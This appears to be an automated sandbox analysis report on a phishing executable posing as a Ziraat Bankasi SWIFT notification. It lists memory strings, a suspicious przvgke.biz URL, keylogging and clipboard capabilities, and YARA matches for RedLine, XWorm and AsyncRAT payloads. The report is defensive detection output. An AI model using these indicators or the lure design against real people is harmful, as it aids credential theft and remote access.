Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response0
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response0
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/x
Source: alg.exe, 00000002.00000003.1322367769.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.przvgke.biz/
Source: alg.exe, 00000002.00000003.1322367769.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.przvgke.biz/N
Source: alg.exe, 00000002.00000003.1322162088.00000000004E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.przvgke.biz/uhxgrttve?usid=25&utid=9755593280
Source: alg.exe, 00000002.00000003.1322162088.00000000004E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.przvgke.biz/uhxgrttve?usid=25&utid=9755593280LocationETagAuthentication-InfoAgeAccept-Ra
Source: alg.exe, 00000002.00000003.1328245615.00000000004DD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1322162088.00000000004E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.przvgke.biz/uhxgrttve?usid=25&utid=9755593280hv
Source: alg.exe, 00000002.00000003.1322367769.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1771772723.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1986704664.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1559227442.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1340496189.00000000004BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.przvgke.biz:80/uhxgrttve?usid=25&utid=9755593280PU
Source: powershell.exe, 00000015.00000002.1539783861.000001DD846A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: alg.exe, 00000002.00000003.1439852307.0000000001550000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: powershell.exe, 0000000E.00000002.1397307978.000001FEA60D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1539783861.000001DD84481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: RegSvcs.exe, 00000009.00000002.1311146517.0000000003E63000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1311146517.0000000003F3C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1311146517.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000A.00000000.1301567190.0000000000EF2000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: alg.exe, 00000002.00000003.2038298699.0000000001450000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: alg.exe, 00000002.00000003.1550726071.0000000001550000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxFailed
Source: alg.exe, 00000002.00000003.1551610424.0000000001550000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1551415000.0000000001550000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
Source: powershell.exe, 00000015.00000002.1614630556.000001DD944F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000015.00000002.1614630556.000001DD944F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000015.00000002.1614630556.000001DD944F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: alg.exe, 00000002.00000003.2038429513.0000000001450000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: powershell.exe, 00000015.00000002.1539783861.000001DD846A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: alg.exe, 00000002.00000003.2038532715.0000000001450000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: alg.exe, 00000002.00000003.2038532715.0000000001450000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881118.0.1
Source: alg.exe, 00000002.00000003.2038004148.0000000001450000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
Source: powershell.exe, 0000000E.00000002.1437482472.000001FEB6143000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1614630556.000001DD944F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: alg.exe, 00000002.00000003.1347358368.00000000014D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.7-zip.org/

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00474164

Contains functionality to modify clipboard data

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00474164

Contains functionality to read the clipboard data

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

0_2_00473F66

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

0_2_0046001C

Potential key logger detected (key state polling based)

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

0_2_0048CABC

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.2.RegSvcs.exe.2e60d94.4.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 9.2.RegSvcs.exe.2e60d94.4.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.2.niellist.exe.4000000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.2.niellist.exe.4d10000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.RegSvcs.exe.2e57738.2.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 9.2.RegSvcs.exe.2e57738.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 9.2.RegSvcs.exe.3eaebc0.8.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 9.2.RegSvcs.exe.3f45010.6.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 9.2.RegSvcs.exe.3ef9df0.9.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 9.2.RegSvcs.exe.2e57738.2.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 9.2.RegSvcs.exe.2e57738.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 9.2.RegSvcs.exe.2e60d94.4.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 9.2.RegSvcs.exe.2e60d94.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 9.2.RegSvcs.exe.3f45010.6.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 10.0.build.exe.ef0000.0.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 9.2.RegSvcs.exe.2e4e0f4.3.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 9.2.RegSvcs.exe.2e4e0f4.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.0.XClient.exe.cf0000.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 11.0.XClient.exe.cf0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 9.2.RegSvcs.exe.3ef9df0.9.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 00000009.00000002.1304482234.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000011.00000002.1415424973.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000003.00000002.1302912222.0000000004000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000000.1302946369.0000000000CF2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00403B3A
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1271710089.00000000004B4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_20f5931f-3
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1271710089.00000000004B4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_b2fc1c23-a
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1262264862.00000000041C3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_14cc24f3-2
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1262264862.00000000041C3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_e18844d4-5
Source: niellist.exe, 00000003.00000002.1291644202.00000000004B4000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_b90dfd7b-4
Source: niellist.exe, 00000003.00000002.1291644202.00000000004B4000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_574a7881-b
Source: niellist.exe, 00000011.00000002.1407658535.00000000004B4000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_bd2db06b-0
Source: niellist.exe, 00000011.00000002.1407658535.00000000004B4000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_e6f7d0dc-3

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Contains functionality to communicate with device drivers

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_0046A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_0046A1EF

Contains functionality to launch a process as a different user

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

0_2_00458310

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_004651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_004651BD

Creates files inside the system directory

Source: C:\Windows\System32\alg.exe

File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\a8259331cca430bb.bin

Jump to behavior

Detected potential crypto function

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0040E6A0	0_2_0040E6A0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0042D975	0_2_0042D975
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_004221C5	0_2_004221C5
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_004362D2	0_2_004362D2
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_004803DA	0_2_004803DA
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0043242E	0_2_0043242E
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_004225FA	0_2_004225FA
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0045E616	0_2_0045E616
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_004166E1	0_2_004166E1
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0043878F	0_2_0043878F
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00436844	0_2_00436844
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00480857	0_2_00480857
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00418808	0_2_00418808
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00468889	0_2_00468889
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0042CB21	0_2_0042CB21
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00436DB6	0_2_00436DB6
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00416F9E	0_2_00416F9E
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00413030	0_2_00413030
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0042F1D9	0_2_0042F1D9
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00423187	0_2_00423187
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00401287	0_2_00401287
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00421484	0_2_00421484
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00415520	0_2_00415520
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00427696	0_2_00427696
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00415760	0_2_00415760
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00421978	0_2_00421978
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0055BCC8	0_2_0055BCC8
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0040FCE0	0_2_0040FCE0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00487DDB	0_2_00487DDB
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00421D90	0_2_00421D90
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0042BDA6	0_2_0042BDA6
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0040DF00	0_2_0040DF00
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00413FE0	0_2_00413FE0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00B100D9	0_2_00B100D9
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AD6EAF	0_2_00AD6EAF
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AD51EE	0_2_00AD51EE
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00B0D580	0_2_00B0D580
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00B03780	0_2_00B03780
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00B0C7F0	0_2_00B0C7F0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00B139A3	0_2_00B139A3
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00B05980	0_2_00B05980
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AD7B71	0_2_00AD7B71
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AD7F80	0_2_00AD7F80
